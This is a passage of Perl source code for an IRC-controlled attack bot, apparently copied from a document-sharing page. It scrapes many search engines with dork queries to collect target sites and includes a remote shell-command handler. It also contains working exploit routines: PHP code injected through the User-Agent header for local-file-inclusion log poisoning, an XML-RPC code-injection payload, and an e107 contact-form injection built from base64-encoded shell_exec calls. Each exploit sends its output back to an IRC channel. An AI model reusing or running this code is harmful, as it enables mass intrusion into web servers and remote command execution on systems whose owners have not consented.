total,@Indotw); } if ($engine eq "IndoUK") { my @Indouk = &Indo5($dork."+site:uk"); push(@tota l,@Indouk); } if ($engine eq "IndoUS") { my @Indous = &Indo6($dork."+site:us"); push(@tota l,@Indous); } if ($engine eq "IndoVN") { my @Indovn = &Indo1($dork."+site:vn"); push(@tota l,@Indovn); } if ($engine eq "IndoWS") { my @Indows = &Indo2($dork."+site:ws"); push(@ total,@Indows); } if ($engine eq "IndoSI") { my @Indosi = &Indo3($dork."+site:si"); push(@tota l,@Indosi); } if ($engine eq "IndoZA") { my @Indoza = &Indo4($dork."+site:za"); push(@tota l,@Indoza); } if ($engine eq "IndoBIZ") { my @Indobiz = &Indo5($dork."+site:biz"); push(@t otal,@Indobiz); } } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google) ; } if ($gps2 == 1) { if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty) ; } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot) ; } if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam) ; } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@bigl obe); } } @clean = &clean(@total); if ($silentmode == 0) { &msg("$chan","$logo15$engine 4<9=4>9 Total:4 [15".scalar(@total)."4] 9 Clean:4 [15".sca lar(@clean)."4] "); } return @clean; } ################################################################################ ## sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = &get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req);

return $res->content; } ######################################### SEARCH ENGINE sub Indo1() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo1.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo2() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo2.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo3() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo3.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo4() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo4.uri_escape($key)."&num=100&start=".$i);

my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo5() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo5.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub Indo6() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ($Indo5.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=1000; $i+=100){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=1 00&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } }

} return @list; } sub walla() { my @list; my $key = $_[0]; for ($b=0; $b<=100; $b+=1) { my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=te xt&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /walla\.co\.il/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub yahoo(){ my @list; my $key = $_[0]; for ($b=1; $b<=1000; $b+=10) { my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=" .$b); my $res = &search_engine_query($search); while ($res =~ m/http\%3a\/\/(.+?)\"/g) { my $link = $1; if ($link !~ /yahoo\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub ask() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=100) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc =1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss="); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /ask\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list;

my $key = $_[0]; my $b = 0; for ($b=1; $b<=400; $b+=10) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_ escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v %3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state= root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=400; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=" .$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub sapo(){ my @list; my $key = $_[0]; for ($b=1; $b<=50; $b+=1) {

my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=ht ml&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local"); my $res = &search_engine_query($search); if ($res !~ m/Next/i) {$b=50;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /\.sapo\.pt/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub lycos() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$ b); my $res = &search_engine_query($search); while ($res =~ m/title=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /lycos\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub uol() { my @list; my $key = $_[0]; for ($b=0; $b<=1000; $b+=10) { my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($ key)."&start=".$b); my $res = &search_engine_query($search); if ($res =~ m/retornou nenhum resultado/i) {$b=500;} while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=300; $b+=20) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20& from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {

my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/ i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape ($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=300; $b+=10) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($ key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=10) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=". $b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = &search_engine_query($search); while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) { my $link = $1; if ($link !~ /biglobe/){ my @grep = &links($link);

push(@list,@grep); } } } return @list; } ######################################### sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln; } sub links() { my @list; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push(@list,$link,$host,$hdir); return @list; } sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", Peer Port=>"80", Proto=>"tcp") or return; my $sget = "GET $query HTTP/1.0\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Accept: */*\r\n"; $sget .= "User-Agent: $uagent\r\n"; $sget .= "Connetion: Close\r\n\r\n"; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); };

return $page; } ######################################### sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub cmdlfi() { my $browser = LWP::UserAgent->new; my $url = $_[0]; my $cmd = $_[1]; my $chan = $_[2]; my $hie = "kulo<?system(\"$cmd 2> /dev/stdout\"); ?>nuwun"; $browser->agent("$hie"); $browser->timeout(7); $response = $browser->get( $url ); if ($response->content =~ /kulo(.*)nuwun/s) { &msg("$chan","$lfilogo12 ".$1." "); } else { &msg("$chan","$lfilogo15 No Output ");

} } sub cmdxml() { my $jed = $_[0]; my $dwa = $_[1]; my $chan = $_[2]; my $userAgent = LWP::UserAgent->new(agent => 'perl post'); $exploit = "<?xml version=\"1.0\"?><methodCall>"; $exploit .= "<methodName>test.method</methodName>"; $exploit .= "<params><param><value><name>',''));"; $exploit .= "echo'kulo';system('".$dwa."');echo'nuwun';exit;/*</name></v alue></param></params></methodCall>"; my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit); if ($response->content =~ /kulo(.*)nuwun/s) { &msg("$chan","$xmllogo12 $1 "); } else { &msg("$chan","$xmllogo15 No Output "); } } sub cmde107() { my $path = $_[0]; my $code = $_[1]; my $chan = $_[2]; my $codecmd = encode_base64($code); my $cmd = 'echo(base64_decode("S3VMbw==").shell_exec(base64_decode("aWQ=")).base 64_decode("S3Vsb05ldA==")).shell_exec(base64_decode("'.$codecmd.'"));'; my $req = HTTP::Request->new(POST => $path); $req->content_type('application/x-www-form-urlencoded'); $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B %5B%2Fphp%5D"); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(7); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /KuloNet(.*)/ ){ $mydata = $1; &msg("$chan","0,1(0E1070)4 $mydata"); } else { &msg("$chan","0,1(0E1070)4 No Output"); } }

You might also like